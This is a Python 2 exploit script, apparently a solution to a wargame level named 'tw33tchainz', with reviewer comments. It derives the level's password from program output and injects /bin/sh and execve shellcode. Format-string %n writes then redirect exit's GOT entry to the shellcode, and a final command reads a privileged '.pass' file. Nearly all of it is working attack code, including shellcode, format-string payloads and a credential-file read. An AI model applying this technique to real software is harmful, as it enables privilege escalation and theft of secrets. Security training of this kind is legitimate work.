  1. import struct
  2. import sys
  3. import subprocess
  4. import binascii
  5. import array
  6. import math
  7. import itertools
  8.  
  9.  
  10. from itertools import dropwhile
  11. from pwnlib.asm import asm, disasm, context, make_elf
  12.  
  13. # toolz was not installed so these functions were copied over
def first(seq):
    """Return the first element of *seq*.

    Accepts any iterable (a fresh iterator is taken, so an iterator passed in
    is advanced by one). Raises StopIteration when *seq* is empty, exactly as
    the toolz original does.

    >>> first('ABC')
    'A'
    """
    it = iter(seq)
    return next(it)
  21.  
def second(seq):
    """Return the second element of *seq*.

    Consumes the first element and returns the next one; an iterator passed in
    is therefore advanced by two. Raises StopIteration when *seq* holds fewer
    than two elements, exactly as the toolz original does.

    >>> second('ABC')
    'B'
    """
    it = iter(seq)
    next(it)
    return next(it)
  29.  
  30.  
# NOTE(review): Python 2 only. `str.decode('hex')`, list-returning `map`
# (indexed as `username[i]` below), str/bytes conflation in the struct.pack
# concatenations, and the `print` statement on the last line all fail on
# Python 3.

# Assembler context for pwnlib: 32-bit x86, which `asm()` below relies on.
context.clear()
context.arch = 'i386'
context.bits = 32

# Two fixed 16-byte values, hex-decoded into lists of byte values so they
# can be combined byte-wise with the target's "Generated" output.
username = map(ord, 'cccc000acccccccccccccccccccccccc'.decode('hex'))
salt = map(ord, 'baba000ababababababababababababa'.decode('hex'))


# Launch the target with both pipes attached; everything below is
# line-oriented writes to stdin and `readline` reads from stdout.
# NOTE(review): stderr is not captured, so target diagnostics go to the
# terminal rather than into `output` / `communicate()` below.
p = subprocess.Popen(['/levels/project1/tw33tchainz'],
                     stdout=subprocess.PIPE,
                     stdin=subprocess.PIPE)


# Every batch is padded to 4096 bytes with newlines; presumably this matches
# the target's read size so each batch is consumed whole -- TODO confirm.
p.stdin.write('\n'.join([
    '\n',
    '\n'
]).ljust(4096, '\n'))


# skip noise
# Consume stdout up to and including the first line containing 'Generated';
# the return value is discarded. `iter(readline, '')` stops at EOF.
first(dropwhile(lambda line: 'Generated' not in line,
                iter(p.stdout.readline, '')))

# The following line is hex text; decode it into a list of byte values.
generated = p.stdout.readline()
generated = map(ord, generated.strip().decode('hex'))

# Build a 32-char hex string: per byte, (username XOR generated) minus salt,
# modulo 256. The `+ 2**32` is redundant in Python (`& 0xff` on a negative
# int already yields the low byte) but harmless.
secret_pass = ''
for i in range(16):
    secret_pass += ("%.2x" % (((username[i] ^ generated[i]) - salt[i] + 2**32) & 0xff))


# Re-pack the 32 hex chars as four little-endian uint32 values; this
# reverses the byte order within each 4-byte group.
s = struct.pack('<I', int(secret_pass[:8], 16)) + \
    struct.pack('<I', int(secret_pass[8:16], 16)) + \
    struct.pack('<I', int(secret_pass[16:24], 16)) + \
    struct.pack('<I', int(secret_pass[24:], 16))



# Menu-driven interaction with the target. What each numeric choice does is
# not visible here; what is visible is that `s` is submitted and then a
# NUL-terminated "/bin/sh" string is stored so its address can be read back
# from the 'Address' line below.
p.stdin.write('\n'.join([

    '3',
    s,
    '\n',

    '6',
    '\n',
    '\n',

    '1',
    "/bin/sh\x00",
    "\n",

    "2",
    "\n",

]).ljust(4096, '\n'))

# Skip to the first stdout line containing 'Address' and keep its last 11
# characters, trimmed -- assumes the target prints the address at the end
# of that line (TODO confirm the exact output format).
output = dropwhile(lambda line: 'Address' not in line,
                   iter(p.stdout.readline, ''))

address = first(output)[-11:].strip()


# execve("/bin/sh", NULL, NULL) on 32-bit Linux: eax = 0xb (execve),
# ebx = pointer to the string stored above, ecx = edx = 0, then int 0x80.
# The string address is baked into the code, so this depends on the target
# reporting a stable address (presumably no ASLR/PIE on the level binary).
instructions = [
    "xor eax, eax",
    "mov ebx, %s" % address,
    "xor ecx, ecx",
    "xor edx, edx",
    "mov al, 0xb",
    "int 0x80"
]


# Assemble each instruction with pwnlib and concatenate the machine code.
shellcode = ''
for instr in instructions:
    shellcode += asm(instr)


# Store the shellcode through the same menu path used for "/bin/sh".
p.stdin.write('\n'.join([
    "1",
    shellcode,
    "\n",

    "2",
    "\n",
]).ljust(4096, '\n'))

output = dropwhile(lambda line: 'Address' not in line,
                   iter(p.stdout.readline, ''))

# `second` skips the first 'Address' line and takes the line after it;
# its last 11 characters are parsed as a hex integer.
shellcode_address = int(second(output)[-11:].strip(), 16)


# exit@plt
# NOTE(review): the location *written* via %n below is more likely the GOT
# slot that exit@plt jumps through than the PLT stub itself -- confirm
# against the binary before trusting this comment.
base_addr = 0x804d03c

# Three consecutive target bytes, each packed as a little-endian 4-byte
# pointer so the positional `%n` below dereferences it.
first_addr = struct.pack('<I', base_addr)
second_addr = struct.pack('<I', base_addr+1)
third_addr = struct.pack('<I', base_addr+2)

# Positional argument index used in `%<offset>$n`; presumably where the
# input buffer itself appears among the stack arguments -- TODO confirm.
offset = 8

# Format-string write, one byte of shellcode_address per input: "A" plus the
# 4-byte address is 5 characters already printed, so `%<lob>x` pads the
# printed count up to the wanted value and `%8$n` stores that count. The
# third input uses the upper 16 bits in a single write.
# Why this works at all: `%n` reaching a writable GOT (no RELRO, no
# FORTIFY_SOURCE checks on %n / positional arguments) and the stored
# shellcode being executable (no NX). Those mitigations are what stop it.
lob = (shellcode_address & 0xff) - 0x5
first_input = "A" + first_addr + "%%%dx" % lob + "%%%i$n" % offset

lob = ((shellcode_address & 0xff00) >> 8) - 0x5
second_input = "A" + second_addr + "%%%dx" % lob + "%%%i$n" % offset


lob = ((shellcode_address & 0xffff0000) >> 16) - 0x5
third_input = "A" + third_addr + "%%%dx" % lob + "%%%i$n" % offset

# Submit the three writes, then choice "5" -- presumably the path that
# ends up calling exit(), now redirected -- TODO confirm.
p.stdin.write('\n'.join([

    "1",
    first_input,
    "\n",

    "1",
    second_input,
    "\n",

    "1",
    third_input,
    "\n",

    "5",
    "\n"


]).ljust(4096, '\n'))


# If the redirect took effect, stdin is now read by the spawned shell; send
# one command, then drain and print everything the process emitted.
p.stdin.write('cat /home/project1_priv/.pass\n')
print p.communicate()[0]